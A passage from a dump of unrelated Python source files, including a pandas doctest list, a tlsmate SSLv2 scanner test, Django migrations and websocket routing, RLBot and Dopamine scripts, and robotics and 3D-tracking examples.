suffixes=('_left', '_right'))\",\n \"df1.merge(df2, how='left', on='a')\",\n ],\n # Not an actual test.\n 'option_context': ['*'],\n 'factorize': ['codes', 'uniques'],\n # Bad top-level use of un-imported function.\n 'merge_ordered': [\n 'merge_ordered(df1, df2, fill_method=\"ffill\", left_by=\"group\")'\n ],\n # Expected error.\n 'pivot': [\"df.pivot(index='foo', columns='bar', values='baz')\"],\n # Never written.\n 'to_pickle': ['os.remove(\"./dummy.pkl\")'],\n **skip_reads\n })\n self.assertEqual(result.failed, 0)\n\n\nif __name__ == '__main__':\n unittest.main()\n"} {"ext": "py", "sha": "1a30aae45d6903fb960b0b90fff41853abdd4ca8", "content": "# -*- coding: utf-8 -*-\n\"\"\"Implements a class to be used for unit testing.\n\"\"\"\nimport pathlib\nfrom tlsmate.workers.eval_cipher_suites import ScanCipherSuites\nfrom tlsmate.tlssuite import TlsSuiteTester\nfrom tlsmate.tlssuite import TlsLibrary\n\nssl2_ck = [\n \"SSL_CK_RC4_128_WITH_MD5\",\n \"SSL_CK_RC2_128_CBC_WITH_MD5\",\n \"SSL_CK_IDEA_128_CBC_WITH_MD5\",\n \"SSL_CK_DES_192_EDE3_CBC_WITH_MD5\",\n]\n\n\nclass TestCase(TlsSuiteTester):\n \"\"\"Class used for tests with pytest.\n\n For more information refer to the documentation of the TcRecorder class.\n \"\"\"\n\n sp_out_yaml = \"profile_basic_ssl2\"\n recorder_yaml = \"recorder_eval_cipher_suites_ssl2\"\n path = pathlib.Path(__file__)\n server_cmd = (\n \"utils/start_openssl --version {library} --port {server_port} \"\n \"--cert1 server-rsa --cert2 server-ecdsa --no-cert-chain \"\n \"-- -www -cipher ALL -ssl2\"\n )\n library = TlsLibrary.openssl1_0_2\n\n server = \"localhost\"\n\n def check_versions(self, versions):\n assert len(versions) == 6\n\n assert versions[0][\"version\"][\"name\"] == \"SSL20\"\n assert versions[0][\"support\"] == \"TRUE\"\n\n assert versions[1][\"version\"][\"name\"] == \"SSL30\"\n assert versions[1][\"support\"] == \"FALSE\"\n\n assert versions[2][\"version\"][\"name\"] == \"TLS10\"\n assert versions[2][\"support\"] == \"FALSE\"\n\n assert versions[3][\"version\"][\"name\"] == \"TLS11\"\n assert versions[3][\"support\"] == \"FALSE\"\n\n assert versions[4][\"version\"][\"name\"] == \"TLS12\"\n assert versions[4][\"support\"] == \"FALSE\"\n\n assert versions[5][\"version\"][\"name\"] == \"TLS13\"\n assert versions[5][\"support\"] == \"FALSE\"\n\n for a, b in zip(ssl2_ck, versions[0][\"cipher_kinds\"]):\n assert a == b[\"name\"]\n\n def check_profile(self, profile):\n self.check_versions(profile[\"versions\"])\n\n def run(self, tlsmate, is_replaying):\n for vers in [\"sslv2\", \"sslv3\", \"tls10\", \"tls11\", \"tls12\", \"tls13\"]:\n tlsmate.config.set(vers, True)\n server_profile = tlsmate.server_profile\n ScanCipherSuites(tlsmate).run()\n\n self.check_profile(server_profile.make_serializable())\n\n\nif __name__ == \"__main__\":\n TestCase().entry(is_replaying=False)\n"} {"ext": "py", "sha": "1a30ad0c82707098faf2026373b77316b76dd85b", "content": "# -*- coding: utf-8 -*-\n#\n# Copyright 2017-2021 - Swiss Data Science Center (SDSC)\n# A partnership between École Polytechnique Fédérale de Lausanne (EPFL) and\n# Eidgenössische Technische Hochschule Zürich (ETHZ).\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Renku database dispatcher.\"\"\"\n\n\nfrom renku.core import errors\nfrom renku.core.management.interface.database_dispatcher import IDatabaseDispatcher\nfrom renku.core.metadata.database import Database\n\n\nclass DatabaseDispatcher(IDatabaseDispatcher):\n \"\"\"Interface for the DatabaseDispatcher.\n\n Handles getting current database (Database) and entering/exiting the stack for the database.\n \"\"\"\n\n def __init__(self):\n self.database_stack = []\n\n @property\n def current_database(self) -> Database:\n \"\"\"Get the currently active database.\"\"\"\n if len(self.database_stack) == 0:\n raise errors.ConfigurationError(\"No database configured for injection\")\n\n return self.database_stack[-1][0]\n\n def push_database_to_stack(self, path: str, commit: bool = False) -> None:\n \"\"\"Create and push a new client to the stack.\"\"\"\n new_database = Database.from_path(path)\n self.database_stack.append((new_database, commit))\n\n def pop_database(self) -> None:\n \"\"\"Remove the current client from the stack.\"\"\"\n popped_database = self.database_stack.pop()\n\n if popped_database[1]:\n popped_database[0].commit()\n\n def finalize_dispatcher(self) -> None:\n \"\"\"Close all database contexts.\"\"\"\n while self.database_stack:\n self.pop_database()\n"} {"ext": "py", "sha": "1a30ad3ef7a67f3cdaf8a458fcdfe8609d0cd219", "content": "import unittest\n\ndef suite():\n return unittest.TestLoader().discover(\"pypobot.tests\", pattern=\"*.py\")\n"} {"ext": "py", "sha": "1a30ad5518def96ca3d9e6b1fb20fe9db7de88f6", "content": "# Generated by Django 3.0.6 on 2020-06-12 17:51\n\nfrom django.conf import settings\nfrom django.db import migrations, models\nimport django.db.models.deletion\nimport django.utils.timezone\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Post',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('title', models.CharField(max_length=256)),\n ('text', models.TextField()),\n ('created_date', models.DateTimeField(default=django.utils.timezone.now)),\n ('published_date', models.DateTimeField(blank=True, null=True)),\n ('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),\n ],\n ),\n migrations.CreateModel(\n name='Comment',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('author', models.CharField(max_length=256)),\n ('text', models.TextField()),\n ('created_date', models.DateTimeField(default=django.utils.timezone.now)),\n ('isApproved', models.BooleanField(default=False)),\n ('post', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='comments', to='blog.Post')),\n ],\n ),\n ]\n"} {"ext": "py", "sha": "1a30adc331c0021f6fce98a0b56daa1d40f27413", "content": "\"\"\"Documentation about the dianna module.\"\"\"\n\n\n# FIXME: put actual code here\ndef hello(name):\n \"\"\"Say hello\n\n Function docstring using Google docstring style.\n\n Args:\n name (str): Name to say hello to\n\n Returns:\n str: Hello message\n\n Raises:\n ValueError: If `name` is equal to `nobody`\n\n Example:\n This function can be called with `Jane Smith` as argument using\n\n >>> from dianna.my_module import hello\n >>> hello('Jane Smith')\n 'Hello Jane Smith!'\n\n \"\"\"\n if name == 'nobody':\n raise ValueError('Can not say hello to nobody')\n return f'Hello {name}!'\n"} {"ext": "py", "sha": "1a30add987a1e8ecdc833b907e0f3bd1ab23df1c", "content": "\"\"\"\n[Python scripts for 3DTracker-FAB (www.3dtracker.org)]\nExample 03: Converting 2D position to 3D\n\nThis is a script demonstrating how to convert 2D positions in a ROI in a RGB image to 3D.\nThe type of conversion is useful for using 2D image based object detection/tracking \nalgorithms to obtain the corresponding 3D object position/trace.\n\nThe example plot 3D points in the ROIs surrouding a can in the 2D images\n\nDate last modified: 2018.10.03\n\"\"\"\n\nimport numpy as np\nimport cv2\n\nimport contextlib\n\nimport pyqtgraph as pg\nimport pyqtgraph.opengl as gl\n\nimport lib3dtracker as tdt # 3DTracker-FAB python library\n\nfname_metadata = './example data/dual_d435_01/dual_d435_01.metadata.xml' # metadata file path\n\nwith contextlib.closing(tdt.DataReader(fname_metadata)) as d: # open data using 'with statement'\n\n i_frame = 10; # video frame number to process\n\n # show camera 1 RGB image and ROI\n roi_cam1 = [120, 70, 40, 80] # ROI; left, top, width, height\n [frame_rgb, frame_d] = d.get_rgbd_frame(i_frame, 0)\n cv2.rectangle(frame_rgb, tuple(roi_cam1[0:2]), (roi_cam1[0]+roi_cam1[2], roi_cam1[1]+roi_cam1[3]), (0, 0, 255), 2)\n cv2.imshow('rgb1', frame_rgb)\n\n # show camera 2 RGB image and ROI\n roi_cam2 = [170, 80, 50, 100] # ROI; left, top, width, height\n [frame_rgb, frame_d] = d.get_rgbd_frame(i_frame, 1)\n cv2.rectangle(frame_rgb, tuple(roi_cam2[0:2]), (roi_cam2[0]+roi_cam2[2], roi_cam2[1]+roi_cam2[3]), (0, 0, 255), 2)\n cv2.imshow('rgb2', frame_rgb)\n\n # get 3D point cloud in ROI\n pc_roi1 = d.get_pc_from_rgbd(i_frame, 0, roi_cam1)\n pc_roi2 = d.get_pc_from_rgbd(i_frame, 1, roi_cam2)\n\n # prepare for plotting\n app=pg.QtGui.QApplication([]) \n w = gl.GLViewWidget() \n \n # read and plot merged point cloud\n pc = d.get_mrgpc_frame(i_frame) \n tdt.plot_pc(pc, w, 4) \n\n # plot point cloud in ROIs\n tdt.plot_pc(pc_roi1, w, 5, (1,0,0,1))\n tdt.plot_pc(pc_roi2, w, 5, (1,0,0,1))\n\n # plot axis\n g=gl.GLAxisItem()\n w.addItem(g)\n\n # show the plot\n w.setCameraPosition(distance = 0.5)\n w.show()\n print('Close the window to quit.')\n pg.QtGui.QApplication.exec_() \n\n"} {"ext": "py", "sha": "1a30ae64bf37a9402670534d865c23f3b71042bd", "content": "\"\"\"RLBotChoreography\n\nUsage:\n ChoreographyHive [--bot-folder=<folder>]\n ChoreographyHive (-h | --help)\n\nOptions:\n -h --help Shows this help message.\n --bot-folder=<folder> Searches this folder for bot configs to use for names and appearances [default: .].\n\"\"\"\nimport copy\nimport os\nimport sys\nimport inspect\nimport time\n\nfrom docopt import docopt\nfrom importlib import reload, import_module\nfrom queue import Queue\nfrom threading import Thread\nfrom os.path import dirname, basename, isfile, join\nimport glob\n\nfrom rlbot.matchconfig.conversions import parse_match_config\nfrom rlbot.parsing.agent_config_parser import load_bot_appearance\nfrom rlbot.parsing.directory_scanner import scan_directory_for_bot_configs\nfrom rlbot.parsing.rlbot_config_parser import create_bot_config_layout\nfrom rlbot.setup_manager import SetupManager\nfrom rlbot.utils.structures.start_match_structures import MAX_PLAYERS\n\nimport hivemind\nfrom queue_commands import QCommand\nfrom choreography.choreography import Choreography\n\n# TODO:\n# - Do bot-folder from inside the GUI\n# - Prettify GUI\nclass RLBotChoreography:\n\n def __init__(self):\n # Runs GUI and Hivemind on two different threads.\n q = Queue()\n thread1 = Thread(target=self.run_gui, args=(q, ))\n thread1.start()\n thread2 = Thread(target=self.run_RLBotChoreography, args=(q, ))\n thread2.start()\n q.join()\n\n\n def setup_match(self):\n # TODO This should be replaced?\n arguments = docopt(__doc__)\n\n bot_directory = arguments['--bot-folder']\n bundles = scan_directory_for_bot_configs(bot_directory)\n\n # Set up RLBot.cfg\n framework_config = create_bot_config_layout()\n config_location = os.path.join(os.path.dirname(__file__), 'rlbot.cfg')\n framework_config.parse_file(config_location, max_index=MAX_PLAYERS)\n match_config = parse_match_config(framework_config, config_location, {}, {})\n\n looks_configs = {idx: bundle.get_looks_config() for idx, bundle in enumerate(bundles)}\n names = [bundle.name for bundle in bundles]\n\n player_config = match_config.player_configs[0]\n match_config.player_configs.clear()\n for i in range(max(len(bundles), self.min_bots)):\n copied = copy.copy(player_config)\n if i < len(bundles):\n copied.name = names[i]\n # If you want to override bot appearances to get a certain visual effect, e.g. with\n # specific boost colors, this is a good place to do it.\n copied.loadout_config = load_bot_appearance(looks_configs[i], 0)\n match_config.player_configs.append(copied)\n\n manager = SetupManager()\n manager.load_match_config(match_config, {})\n manager.connect_to_game()\n manager.start_match()\n\n\n def run_RLBotChoreography(self, queue):\n \"\"\"\n If Hivemind breaks out of game_loop it is reloaded and recreated.\n \"\"\"\n # Waits until a START command is received.\n while queue.get() != QCommand.START:\n continue\n\n self.setup_match()\n\n while True:\n my_hivemind = hivemind.Hivemind(queue, self.choreo_obj)\n my_hivemind.start() # Loop only quits on STOP command.\n\n # Reloads hivemind for new changes to take place.\n # reload(sys.modules[self.choreo_obj.__module__])\n reload(hivemind)\n\n # Checks what to do after Hivemind died.\n command = queue.get()\n if command == QCommand.ALL:\n self.setup_match()\n elif command == QCommand.EXIT:\n break\n\n exit() # Clean exit.\n\n\n def run_gui(self, queue):\n \"\"\"\n Runs the simple gui.\n \"\"\"\n\n def reload_choreographies():\n \"\"\"\n Finds and reloads all choreo modules and puts the found choreographies inside a dictionary.\n \"\"\"\n # Automatically finds all choreo modules.\n modules = glob.glob(join(dirname(__file__), \"choreography/choreos/*.py\"))\n choreo_modules = [basename(f)[:-3] for f in modules if isfile(f) and not f.endswith('__init__.py')]\n\n choreographies = {}\n for choreo in choreo_modules:\n module = f'choreography.choreos.{choreo}'\n\n # Try reloading the module.\n try:\n reload(sys.modules[module])\n classes = inspect.getmembers(sys.modules[module], inspect.isclass)\n\n # If not loaded yet, import it.\n except:\n print(f'Module not found, importing {module}')\n import_module(module)\n classes = inspect.getmembers(sys.modules[module], inspect.isclass)\n\n # Find all the choreography classes inside.\n finally:\n for name, obj in classes:\n # Checks whether the class subclasses Choreography.\n if issubclass(obj, Choreography) and obj is not Choreography:\n # FIXME Watch out for name conflicts!\n choreographies[name] = obj\n\n return choreographies\n\n def start():\n num_bots_changed()\n print(\"[RLBotChoreography]: Starting up!\")\n queue.put(QCommand.START)\n\n # Removes the button so we cannot start again.\n button_start.destroy()\n\n # Hive reset button.\n button_reload_hive = tk.Button(frame, text=\"↻ Hivemind\", command=reload_hive)\n button_reload_hive.pack()\n\n # All reset button.\n button_reload_all = tk.Button(frame, text=\"↻ All\", command=reload_all)\n button_reload_all.pack()\n\n def num_bots_changed():\n \"\"\"\n Looks at the choreography's requested number of bots and uses that. Otherwise will use the entered number.\n \"\"\"\n try:\n num_bots = self.choreo_obj.get_num_bots()\n except NotImplementedError:\n num_bots = int(entry_num_bots.get())\n finally:\n self.min_bots = min(int(num_bots), MAX_PLAYERS)\n entry_num_bots.delete(0, last=tk.END)\n entry_num_bots.insert(0, self.min_bots)\n\n def choreo_selected(var):\n \"\"\"\n Updates the selected choreography.\n \"\"\"\n self.choreographies = reload_choreographies()\n self.choreo_obj = self.choreographies[var]\n num_bots_changed()\n\n def reload_hive():\n num_bots_changed()\n print(\"[RLBotChoreography]: Stopping Hivemind.\")\n queue.put(QCommand.STOP)\n choreo_selected(menuvar.get())\n print(\"[RLBotChoreography]: Reloading Hivemind.\")\n queue.put(QCommand.HIVE)\n\n def reload_all():\n num_bots_changed()\n print(\"[RLBotChoreography]: Stopping Hivemind.\")\n queue.put(QCommand.STOP)\n choreo_selected(menuvar.get())\n print(\"[RLBotChoreography]: Reloading all.\")\n queue.put(QCommand.ALL)\n\n # TODO Make GUI look better.\n import tkinter as tk\n\n root = tk.Tk()\n frame = tk.Frame(root)\n frame.pack()\n\n # Start button.\n button_start = tk.Button(frame, text=\"Start\", command=start)\n button_start.pack()\n\n # Dropdown menu.\n self.choreographies = reload_choreographies()\n menuvar = tk.StringVar(root)\n menuvar.set('LightfallChoreography') # Set the default option\n dropMenu = tk.OptionMenu(frame, menuvar, *self.choreographies, command=choreo_selected)\n dropMenu.pack()\n\n # Label for the entry box.\n label_num_bots = tk.Label(frame, text=\"Number of bots\")\n label_num_bots.pack()\n\n # Number of bots entry box.\n entry_num_bots = tk.Entry(frame)\n entry_num_bots.insert(0, 10)\n entry_num_bots.pack()\n\n # This is here just to make sure everything is set up by default.\n choreo_selected(menuvar.get())\n\n root.mainloop()\n\n # Clean exit.\n print('[RLBotChoreography]: Shutting down.')\n queue.put(QCommand.STOP)\n queue.put(QCommand.EXIT)\n exit()\n\n\nif __name__ == '__main__':\n # Starts the show :)\n RLBotChoreography()\n"} {"ext": "py", "sha": "1a30aede77e1ffa311b709ffc5589dc113b7e00b", "content": "# Copyright 2017 BrainPad Inc. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\nfrom __future__ import absolute_import, division, print_function, unicode_literals\n\nimport argparse\n\nfrom web.app import create_app\nfrom dobot.utils import detect_dobot_port, dobot_is_on_port\n\nDEFAULT_BAUDRATE = 115200\n\nparser = argparse.ArgumentParser(description='Run Dobot WebAPI.')\nparser.add_argument('--port', type=int, default=18001)\nparser.add_argument('--host', type=str, default='0.0.0.0')\nparser.add_argument('--dobot-port', type=str, default=None)\nparser.add_argument('--tuner-file', type=str, default='/var/tmp/robot_tuner.dat')\nparser.add_argument('--instance_path', type=str, default=None)\n\nargs = parser.parse_args()\n\nif not args.dobot_port:\n dobot_port = detect_dobot_port(DEFAULT_BAUDRATE)\n if dobot_port is None:\n print('dobot offline')\n exit(1)\nelse:\n dobot_port = args.dobot_port\n if not dobot_is_on_port(dobot_port, DEFAULT_BAUDRATE):\n print('dobot is not detected on port {}'.format(dobot_port))\n exit(1)\n\napp = create_app(dobot_port, args.tuner_file, args.instance_path)\n\nif __name__ == '__main__':\n app.run(port=args.port, host=args.host)\n"} {"ext": "py", "sha": "1a30af099f6af14d0f31314f2c44af89af1e7b18", "content": "# coding=utf-8\n# Copyright 2018 The Dopamine Authors.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Library used by example_viz.py to generate visualizations.\n\nThis file illustrates the following:\n - How to subclass an existing agent to add visualization functionality.\n - For DQN we visualize the cumulative rewards and the Q-values for each\n action (MyDQNAgent).\n - For Rainbow we visualize the cumulative rewards and the Q-value\n distributions for each action (MyRainbowAgent).\n - How to subclass Runner to run in eval mode, lay out the different subplots,\n generate the visualizations, and compile them into a video (MyRunner).\n - The function `run()` is the main entrypoint for running everything.\n\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\nimport sys\n\nfrom absl import logging\n\nfrom dopamine.agents.dqn import dqn_agent\nfrom dopamine.agents.rainbow import rainbow_agent\nfrom dopamine.discrete_domains import atari_lib\nfrom dopamine.discrete_domains import iteration_statistics\nfrom dopamine.discrete_domains import run_experiment\nfrom dopamine.utils import agent_visualizer\nfrom dopamine.utils import atari_plotter\nfrom dopamine.utils import bar_plotter\nfrom dopamine.utils import line_plotter\nimport gin\nimport numpy as np\nimport tensorflow as tf\nimport tf_slim\nimport pdb\nimport matplotlib.pyplot as plt\n\n\nclass MyDQNAgent(dqn_agent.DQNAgent):\n \"\"\"Sample DQN agent to visualize Q-values and rewards.\"\"\"\n\n def __init__(self, sess, num_actions, summary_writer=None):\n super(MyDQNAgent, self).__init__(sess, num_actions,\n summary_writer=summary_writer)\n self.q_values = [[] for _ in range(num_actions)]\n self.rewards = []\n\n def step(self, reward, observation, step_number):\n self.rewards.append(reward)\n return super(MyDQNAgent, self).step(reward, observation, step_number)\n\n def _select_action(self, step_number):\n action = super(MyDQNAgent, self)._select_action(step_number)\n # print(\"on selectionne ici\")\n q_vals = self._sess.run(self._net_outputs.q_values,\n {self.state_ph: self.state})[0]\n for i in range(len(q_vals)):\n self.q_values[i].append(q_vals[i])\n return action\n\n def reload_checkpoint(self, checkpoint_path, use_legacy_checkpoint=False):\n if use_legacy_checkpoint:\n variables_to_restore = atari_lib.maybe_transform_variable_names(\n tf.compat.v1.global_variables(), legacy_checkpoint_load=True)\n else:\n global_vars = set([x.name for x in tf.compat.v1.global_variables()])\n ckpt_vars = [\n '{}:0'.format(name)\n for name, _ in tf.train.list_variables(checkpoint_path)\n ]\n include_vars = list(global_vars.intersection(set(ckpt_vars)))\n variables_to_restore = tf_slim.get_variables_to_restore(\n include=include_vars)\n if variables_to_restore:\n reloader = tf.compat.v1.train.Saver(var_list=variables_to_restore)\n reloader.restore(self._sess, checkpoint_path)\n logging.info('Done restoring from %s', checkpoint_path)\n else:\n logging.info('Nothing to restore!')\n\n def get_q_values(self):\n return self.q_values\n\n def get_rewards(self):\n return [np.cumsum(self.rewards)]\n\n\nclass MyRainbowAgent(rainbow_agent.RainbowAgent):\n \"\"\"Sample Rainbow agent to visualize Q-values and rewards.\"\"\"\n\n def __init__(self, sess, num_actions, summary_writer=None):\n super(MyRainbowAgent, self).__init__(sess, num_actions,\n summary_writer=summary_writer)\n self.rewards = []\n\n def step(self, reward, observation, step_number):\n self.rewards.append(reward)\n return super(MyRainbowAgent, self).step(reward, observation, step_number)\n\n def reload_checkpoint(self, checkpoint_path, use_legacy_checkpoint=False):\n if use_legacy_checkpoint:\n variables_to_restore = atari_lib.maybe_transform_variable_names(\n tf.compat.v1.global_variables(), legacy_checkpoint_load=True)\n else:\n global_vars = set([x.name for x in tf.compat.v1.global_variables()])\n ckpt_vars = [\n '{}:0'.format(name)\n for name, _ in tf.train.list_variables(checkpoint_path)\n ]\n include_vars = list(global_vars.intersection(set(ckpt_vars)))\n variables_to_restore = tf_slim.get_variables_to_restore(\n include=include_vars)\n if variables_to_restore:\n reloader = tf.compat.v1.train.Saver(var_list=variables_to_restore)\n reloader.restore(self._sess, checkpoint_path)\n logging.info('Done restoring from %s', checkpoint_path)\n else:\n logging.info('Nothing to restore!')\n\n def get_probabilities(self):\n return self._sess.run(tf.squeeze(self._net_outputs.probabilities),\n {self.state_ph: self.state})\n\n def get_rewards(self):\n return [np.cumsum(self.rewards)]\n\n\nclass MyRunner(run_experiment.Runner):\n \"\"\"Sample Runner class to generate visualizations.\"\"\"\n\n def __init__(self, base_dir, trained_agent_ckpt_path, create_agent_fn,\n use_legacy_checkpoint=False):\n self._trained_agent_ckpt_path = trained_agent_ckpt_path\n self._use_legacy_checkpoint = use_legacy_checkpoint\n super(MyRunner, self).__init__(base_dir, create_agent_fn)\n\n def _initialize_checkpointer_and_maybe_resume(self, checkpoint_file_prefix):\n self._agent.reload_checkpoint(self._trained_agent_ckpt_path,\n self._use_legacy_checkpoint)\n self._start_iteration = 0\n\n def _run_one_iteration(self, iteration):\n statistics = iteration_statistics.IterationStatistics()\n logging.info('Starting iteration %d', iteration)\n _, _ = self._run_eval_phase(statistics)\n return statistics.data_lists\n\n def _run_one_iteration(self, iteration):\n statistics = iteration_statistics.IterationStatistics()\n logging.info('Starting iteration %d', iteration)\n\n num_episodes_eval, average_reward_eval = self._run_eval_phase(\n statistics)\n return statistics.data_lists\n\n def _run_eval_phase(self, statistics):\n # Perform the evaluation phase -- no learning.\n self._agent.eval_mode = True\n\n _, sum_returns, num_episodes = self._run_one_phase(\n self._evaluation_steps, statistics, 'eval')\n average_return = sum_returns / num_episodes if num_episodes > 0 else 0.0\n logging.info('Average undiscounted return per evaluation episode: %.2f',\n average_return)\n statistics.append({'eval_average_return': average_return})\n return num_episodes, average_return\n\n def _run_one_phase(self, min_steps, statistics, run_mode_str):\n step_count = 0\n num_episodes = 0\n sum_returns = 0.\n print(\"min_steps\", min_steps)\n while step_count < min_steps:\n print(\">>>>> step_count\", step_count)\n episode_length, episode_return = self._run_one_episode()\n statistics.append({\n '{}_episode_lengths'.format(run_mode_str): episode_length,\n '{}_episode_returns'.format(run_mode_str): episode_return\n })\n step_count += episode_length\n sum_returns += episode_return\n num_episodes += 1\n # We use sys.stdout.write instead of logging so as to flush frequently\n # without generating a line break.\n sys.stdout.write('Steps executed: {} '.format(step_count) +\n 'Episode length: {} '.format(episode_length) +\n 'Return: {}\\r'.format(episode_return))\n sys.stdout.flush()\n return step_count, sum_returns, num_episodes\n\n def _run_one_episode(self):\n step_number = 0\n total_reward = 0.\n\n action = self._initialize_episode()\n is_terminal = False\n\n # Keep interacting until we reach a terminal state.\n while True:\n observation, reward, is_terminal = self._run_one_step(action, step_number)\n\n total_reward += reward\n step_number += 1\n print(\"step_number\", step_number)\n\n if self._clip_rewards:\n # Perform reward clipping.\n reward = np.clip(reward, -1, 1)\n\n if (self._environment.game_over or\n step_number == self._max_steps_per_episode):\n # Stop the run loop once we reach the true end of episode.\n break\n elif is_terminal:\n # If we lose a life but the episode is not over, signal an artificial\n # end of episode to the agent.\n self._end_episode(reward, is_terminal)\n action = self._agent.begin_episode(observation)\n else:\n action = self._agent.step(reward, observation, step_number)\n\n self._end_episode(reward, is_terminal)\n\n return step_number, total_reward\n\n def _run_one_step(self, action, step_number):\n observation, reward, is_terminal, _ = self._environment.step(action)\n # Saving the render\n if True:\n if step_number > 900 and step_number < 1000:\n image = self._environment.render('rgb_array')\n plt.imshow(image)\n plt.savefig(\"/home/hugo/saliency_maps/Rainbow-Tennis/render/render\"+str(step_number)+\".png\")\n return observation, reward, is_terminal\n\ndef create_dqn_agent(sess, environment, summary_writer=None):\n return MyDQNAgent(sess, num_actions=environment.action_space.n,\n summary_writer=summary_writer)\n\n\ndef create_rainbow_agent(sess, environment, summary_writer=None):\n return MyRainbowAgent(sess, num_actions=environment.action_space.n,\n summary_writer=summary_writer)\n\n\ndef create_runner(base_dir, trained_agent_ckpt_path, agent='dqn',\n use_legacy_checkpoint=False):\n create_agent = create_dqn_agent if agent == 'dqn' else create_rainbow_agent\n return MyRunner(base_dir, trained_agent_ckpt_path, create_agent,\n use_legacy_checkpoint)\n\n\n\n\n\ndef run(agent, game, num_steps, root_dir, restore_ckpt,\n use_legacy_checkpoint=False):\n \"\"\"Main entrypoint for running and generating visualizations.\n\n Args:\n agent: str, agent type to use.\n game: str, Atari 2600 game to run.\n num_steps: int, number of steps to play game.\n root_dir: str, root directory where files will be stored.\n restore_ckpt: str, path to the checkpoint to reload.\n use_legacy_checkpoint: bool, whether to restore from a legacy (pre-Keras)\n checkpoint.\n \"\"\"\n tf.compat.v1.reset_default_graph()\n config = \"\"\"\n atari_lib.create_atari_environment.game_name = '{}'\n WrappedReplayBuffer.replay_capacity = 300\n \"\"\".format(game)\n base_dir = os.path.join(root_dir, 'agent_viz', game, agent)\n gin.parse_config(config)\n runner = create_runner(base_dir, restore_ckpt, agent, use_legacy_checkpoint)\n iteration = 0\n runner._run_one_iteration(iteration)\n"} {"ext": "py", "sha": "1a30b03607219069c5104c56e476a1b81f5fdd06", "content": "# See also: 📖 [Channels - Consumers](https://channels.readthedocs.io/en/latest/topics/consumers.html)\nfrom django.conf.urls import url\n\n# Websock練習1\nfrom webapp1.websocks.websock_practice1.v1.consumer import WebsockPractice1V1Consumer\n# ------- ----------------------------- -------- --------------------------\n# 1 2 3 4\n# 1. アプリケーション フォルダー名\n# 2. ディレクトリー名\n# 3. Python ファイル名。拡張子抜き\n# 4. クラス名\n\n# Websock練習2\nfrom webapp1.websocks.websock_practice2.v1.consumer import WebsockPractice2V1Consumer\n# ^ ^\n# ------- ----------------------------- -------- --------------------------\n# 1 2 3 4\n# 1. アプリケーション フォルダー名\n# 2. ディレクトリー名\n# 3. Python ファイル名。拡張子抜き\n# 4. クラス名\n\n# 〇×ゲームの練習1\nfrom webapp1.websocks.tic_tac_toe.v1.consumer import TicTacToeV1Consumer\n# ------- ----------------------- -------- -------------------\n# 1 2 3 4\n# 1. アプリケーション フォルダー名\n# 2. ディレクトリー名\n# 3. Python ファイル名。拡張子抜き\n# 4. クラス名\n\n# 〇×ゲームの練習2\nfrom webapp1.websocks.tic_tac_toe.v2.consumer_custom import TicTacToeV2ConsumerCustom\n# ^ two ^ two\n# ------- ----------------------- --------------- -------------------------\n# 1 2 3 4\n# 1. アプリケーション フォルダー名\n# 2. ディレクトリー名\n# 3. Python ファイル名。拡張子抜き\n# 4. クラス名\n\n# 〇×ゲームの練習3.1\nfrom webapp1.websocks.tic_tac_toe.v3o1.consumer_custom import TicTacToeV3o1ConsumerCustom\n# ^^^ three o one ^^^ three o one\n# ------- ------------------------- --------------- ---------------------------\n# 1 2 3 4\n# 1. アプリケーション フォルダー名\n# 2. ディレクトリー名\n# 3. Python ファイル名。拡張子抜き\n# 4. クラス名\n\n\nwebsocket_urlpatterns = [\n\n # +----\n # | Websock練習1\n\n # Websock練習1\n url(r'^websock-practice1/v1/$', WebsockPractice1V1Consumer.as_asgi()),\n # ----------------------- ------------------------------------\n # 1 2\n # 1. URLのパスの部分の、Django での正規表現の書き方\n # 2. クラス名とメソッド。 URL を ASGI形式にする\n\n # | Websock練習1\n # +----\n\n\n\n\n # +----\n # | Websock練習2\n\n # Websock練習2\n url(r'^websock-practice2/v1/$', WebsockPractice2V1Consumer.as_asgi()),\n # ^ ^\n # ----------------------- ------------------------------------\n # 1 2\n # 1. URLのパスの部分の、Django での正規表現の書き方\n # 2. クラス名とメソッド。 URL を ASGI形式にする\n\n # | Websock練習2\n # +----\n\n\n\n\n # 〇×ゲームの練習1\n url(r'^tic-tac-toe/v1/playing/(?P<room_name>\\w+)/$',\n # --------------------------------------------\n # 1\n TicTacToeV1Consumer.as_asgi()),\n # -----------------------------\n # 2\n # 1. 例えば `http://example.com/tic-tac-toe/v1/playing/Elephant/` のようなURLのパスの部分の、Django での正規表現の書き方。\n # room_name は変数として渡される\n # 2. クラス名とメソッド。 URL を ASGI形式にする\n\n # 〇×ゲームの練習2\n url(r'^tic-tac-toe/v2/playing/(?P<kw_room_name>\\w+)/$',\n # 